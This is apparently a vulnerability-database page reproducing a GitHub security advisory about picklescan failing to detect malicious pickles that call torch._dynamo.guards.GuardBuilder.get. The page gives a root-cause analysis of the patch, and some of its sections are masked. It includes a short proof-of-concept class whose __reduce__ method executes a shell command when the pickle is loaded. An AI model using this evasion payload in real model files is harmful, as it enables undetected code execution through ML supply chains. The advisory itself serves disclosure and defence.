N/A

CVSS Score

Basic Information

CVE ID

GHSA ID

GHSA-86cj-95qr-2p4f

EPSS Score

CWE

CWE-345

Published

8/22/2025

Updated

8/22/2025

KEV Status

Technology

Python

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

GHSA-86cj-95qr-2p4f

GHSA-86cj-95qr-2p4f: Picklescan missing detection when calling pytorch function torch._dynamo.guards.GuardBuilder.get

Summary

Using torch._dynamo.guards.GuardBuilder.get function, which is a pytorch library function to execute remote pickle file.

Details

The attack payload executes in the following steps:

First, the attacker craft the payload by calling to torch._dynamo.guards.GuardBuilder.get function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.

PoC

import types
import torch._dynamo.guards as guards

class EvilTorchDynamoGuardsGet:
    def __reduce__(self):
        fake_self = types.SimpleNamespace(scope={})
        name = "__import__('os').system('whoami')"
        return guards.GuardBuilder.get, (fake_self, name)

Impact

Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded. Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.

Corresponding

https://github.com/FredericDT https://github.com/Qhaoduoyu

(GitHub Advisory)

N/A

CVSS Score

Basic Information

CVE ID

GHSA ID

GHSA-86cj-95qr-2p4f

EPSS Score

CWE

CWE-345

Published

8/22/2025

Updated

8/22/2025

KEV Status

Technology

Python

Technical Details

CVSS Vector

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
picklescan	pip	<= 0.0.27	0.0.28

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability lies in the picklescan library's failure to detect a malicious pickle file that uses torch._dynamo.guards.GuardBuilder.get for remote code execution. The patch, identified by commit 7f994d62084fe43f1cffdef2f9bae6923344ef53, addresses this by updating the _unsafe_globals dictionary in src/picklescan/scanner.py to include "torch._dynamo.guards": {"GuardBuilder.get"}. The function scan_pickle_bytes is the primary function responsible for orchestrating the scan of a pickle file. It utilizes the _unsafe_globals list (via the _build_scan_result_from_raw_globals helper function) to determine if any of the globals used in the pickle are malicious. By not having torch._dynamo.guards.GuardBuilder.get in this list, scan_pickle_bytes would fail to report a malicious pickle using this technique. Therefore, scan_pickle_bytes is the vulnerable function as it's the entry point for the flawed detection logic. The patch ensures that this function, and the overall scan, will now correctly identify this threat.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

### Summ*ry Usin* tor**._*yn*mo.*u*r*s.*u*r**uil**r.**t *un*tion, w*i** is * pytor** li*r*ry *un*tion to *x**ut* r*mot* pi*kl* *il*. ### **t*ils T** *tt**k p*ylo** *x**ut*s in t** *ollowin* st*ps: *irst, t** *tt**k*r *r**t t** p*ylo** *y **llin*

Reasoning

T** vuln*r**ility li*s in t** `pi*kl*s**n` li*r*ry's **ilur* to **t**t * m*li*ious pi*kl* *il* t**t us*s `tor**._*yn*mo.*u*r*s.*u*r**uil**r.**t` *or r*mot* *o** *x**ution. T** p*t**, i**nti*i** *y *ommit `****************************************`, **

N/A

Basic Information

Concerned about an active attack path?

GHSA-86cj-95qr-2p4f: Picklescan missing detection when calling pytorch function torch._dynamo.guards.GuardBuilder.get

Summary

Details

PoC

Impact

Corresponding

N/A

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI